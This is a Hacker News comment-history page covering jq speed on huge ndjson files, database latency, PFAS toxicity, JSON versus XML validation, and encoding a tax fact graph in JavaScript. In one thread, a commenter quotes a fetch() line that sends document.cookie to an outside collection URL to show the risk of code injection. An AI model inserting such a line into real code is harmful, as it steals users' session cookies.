Hacker Newsnew | past | comments | ask | show | jobs | submit | n_e's commentslogin

I haven't checked, but it would be surprising that the min-release-age applies to npm audit and equivalent commands

> Cloud sql lowest tier is pennies a day

Unless things have improved it's also hideously slow, like trivial queries on a small table taking tens of milliseconds. Though I guess that if the alternative is google sheets that's not really a concern.


I process TB-size ndjson files. I want to use jq to do some simple transformations between stages of the processing pipeline (e.g. rename a field), but it so slow that I write a single-use node or rust script instead.

Now I'm really curious. What field are you in that ndjson files of that size are common?

I'm sure there are reasons against switching to something more efficient–we've all been there–I'm just surprised.


> Now I'm really curious. What field are you in that ndjson files of that size are common?

I'm not OP,but structured JSON logs can easily result in humongous ndjson files, even with a modest fleet of servers over a not-very-long period of time.


So what's the use case for keeping them in that format rather than something more easily indexed and queryable?

I'd probably just shove it all into Postgres, but even a multi terabyte SQLite database seems more reasonable.


Replying here because the other comment is too deeply nested to reply.

Even if it's once off, some people handle a lot of once-offs, that's exactly where you need good CLI tooling to support it.

Sure jq isn't exactly super slow, but I also have avoided it in pipelines where I just need faster throughput.

rg was insanely useful in a project I once got where they had about 5GB of source files, a lot of them auto-generated. And you needed to find stuff in there. People were using Notepad++ and waiting minutes for a query to find something in the haystack. rg returned results in seconds.


You make some good points. I've worked in support before, so I shouldn't have discounted how frequent "once-offs" can be.

The use case could be e.g. exactly processing an old trove of logs into something more easily indexed and queryable, and you might want to use jq as part of that processing pipeline

Fair, but for a once-off thing performance isn't usually a major factor.

The comment I was replying to implied this was something more regular.

EDIT: why is this being downvoted? I didn't think I was rude. The person I responded to made a good point, I was just clarifying that it wasn't quite the situation I was asking about.


At scale, low performance can very easily mean "longer than the lifetime of the universe to execute." The question isn't how quickly something will get done, but whether it can be done at all.

Good point. I said it above, but I'll repeat it here that I shouldn't have discounted how frequent once offs can be. I've worked in support before so I really should've known better

Certain people/businesses deal with one-off things every day. Even for something truly one-off, if one tool is too slow it might still be the difference between being able to do it once or not at all.

This reminds me of someone who wrote a regex tool that matches by compiling regexes (at runtime of the tool) via LLVM to native code.

You could probably do something similar for a faster jq.


I would love, _love_ to know more about your data formats, your tools, what the JSON looks like, basically as much as you're willing to share. :)

For about a month now I've been working on a suite of tools for dealing with JSON specifically written for the imagined audience of "for people who like CLIs or TUIs and have to deal with PILES AND PILES of JSON and care deeply about performance".

For me, I've been writing them just because it's an "itch". I like writing high performance/efficient software, and there's a few gaps that it bugged me they existed, that I knew I could fill.

I'm having fun and will be happy when I finish, regardless, but it would be so cool if it happened to solve a problem for someone else.


I maintain some tools for the videogame World of Warships. The developer has a file called GameParams.bin which is Python-pickled data (their scripting language is Python).

Working with this is pretty painful, so I convert the Pickled structure to other formats including JSON.

The file has always been prettified around ~500MB but as of recently expands to about 3GB I think because they’ve added extra regional parameters.

The file inflates to a large size because Pickle refcounts objects for deduping, whereas obviously that’s lost in JSON.

I care about speed and tools not choking on the large inputs so I use jaq for querying and instruction LLMs operating on the data to do the same.


This isn't for you then

> The query language is deliberately less expressive than jq's. jsongrep is a search tool, not a transformation tool-- it finds values but doesn't compute new ones. There are no filters, no arithmetic, no string interpolation.

Mind me asking what sorts of TB json files you work with? Seems excessively immense.


> Uses jq for TB json files

> Hadoop: bro

> Spark: bro

> hive: bro

> data team: bro


made me remember this article

<https://adamdrake.com/command-line-tools-can-be-235x-faster-...>

  Command-line Tools can be 235x Faster than your Hadoop Cluster (2014)

  Conclusion: Hopefully this has illustrated some points about using and abusing tools like Hadoop for data processing tasks that can better be accomplished on a single machine with simple shell commands and tools.

This article is good for new programmers to understand why certain solutions are better at scale, there is no silver bullet. And also, this is from 2014, and the dataset is < 4GB. No reason to use hadoop.

The discussion we had here was involving TB of data, so I'm curious how this is faster with CLIs rather than parallel processing...


JQ is very convenient, even if your files are more than 100GB. I often need to extract one field from huge JSON line files, I just pipe jq to it to get results. It's slower, but implementing proper data processing will take more time.

More than 100GB can be 101GB, 500GB or 1TB+. I was speaking about 1TB+ files. I'm not sure you can get it faster unless you have a parallel processor.

are those tools known for their fast json parsers?

If we talk about TB or PB+ scales, then yes.

Oh, can you post some benchmarks? I didn't know that parser throughput per core would change with the amount of data like that.

> but so could FFI calls to another language for the CPU bound work

Worker threads can be more convenient than FFI, as you don't need to compile anything, you can reuse the main application's functions, etc.


True! Although in a lot of Node you DO have a compile chain (typescript) you need to account for. There’s a transactional cost there to get these working well, and only sharing the code it needs. These days it’s much smaller than it used to be, though, so worker functions are seeing more use.

I make my comment to note tho that in many envs it’s easier to scale out than account for all the extra complications of multiple processes in a single container.


I assume they were talking about the comments here, not the post which I agree is great.


PFAS are many different molecules.

For example PTFE is a large molecule with strong bonds, and as a consequence isn't very reactive and likely safe.

On the other hand, perfluoroalkyls such as PFOA have the same shape as fatty acids, so they bind to the same places such as in the liver, which makes them grave health hazards.

Many precursors used for making PFAS are also toxic, so for example, even if PTFE is safe, manufacturing it isn't.


> JSON: No comments, no datatypes, no good system for validation.

I don't agree at all. With tools like Zod, it is much more pleasant to write schemas and validate the file than with XML. If you want comments, you can use JSON5 or YAML, that can be validated the same way.


I think you have it backward. Libraries like zod exist _because_ JSON is so ubiquitous. Someone could just as easily implement a zod for XML. I’m not a huge proponent of XML (hard to write, hard to parse), but what you describe are not technical limitations of the format.


I think that you're missing that the parent poster and I are implicitly assuming that XML is validated the most common way, i.e. with XSD, and that I'm comparing XSD validation and Zod.


Ah that’s fair. So the discussion is about the quality of the validation libraries?


After thinking a bit about the problem, and assuming the project's language is javascript, I'd write the fact graph directly in javascript:

  const totalEstimatedTaxesPaid = writable("totalEstimatedTaxesPaid", {
    type: "dollar",
  });
  
  const totalPayments = fact(
    "totalPayments",
    sum([
      totalEstimatedTaxesPaid,
      totalTaxesPaidOnSocialSecurityIncome,
      totalRefundableCredits,
    ]),
  );
  
  const totalOwed = fact("totalOwed", diff(totalTax, totalPayments));

This way it's a lot terser, you have auto-completion and real-time type-checking.

The code that processes the graph will also be simpler as you don't have to parse the XML graph and turn it into something that can be executed.

And if you still need XML, you can generate it easily.


This is an interesting, but objectively terrible idea. You’ve now introduced arbitrary code execution into something that should be data.

Now let me send you a fact graph that contains:

    fetch(`https://callhome.com/collect?s=${document.cookie}`)


The "data" is part of the tax simulation source code, not untrusted input, so such an attack vector doesn't exist.


Yet. You’re adding one other thing that authors need to keep in mind when developing the product, fixing bugs, and adding features. The fact that the input must be trusted is not an intrinsic part of the business logic, it’s an additional caveat that humans need to remember.


What exactly do the developers need to keep in mind?


Well think about this from a product perspective. A natural extension of this is to be able to simulate tax code that hasn’t been implemented yet. “Bring your own facts” is practically begging to be a feature here.


You do know that JSON exists?

If it's not clear. The format used to store data can be different from the DSL that creates it.


That is exactly my point.


That repetition of variable and name is not the most terse, though. At least with XML, the repetition in the end tag is handled for you by pretty much every XML-aware text editor.


  (c) The contribution was provided directly to me by some other
      person who certified (a), (b) or (c) and I have not modified
      it.


In which countries?



Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: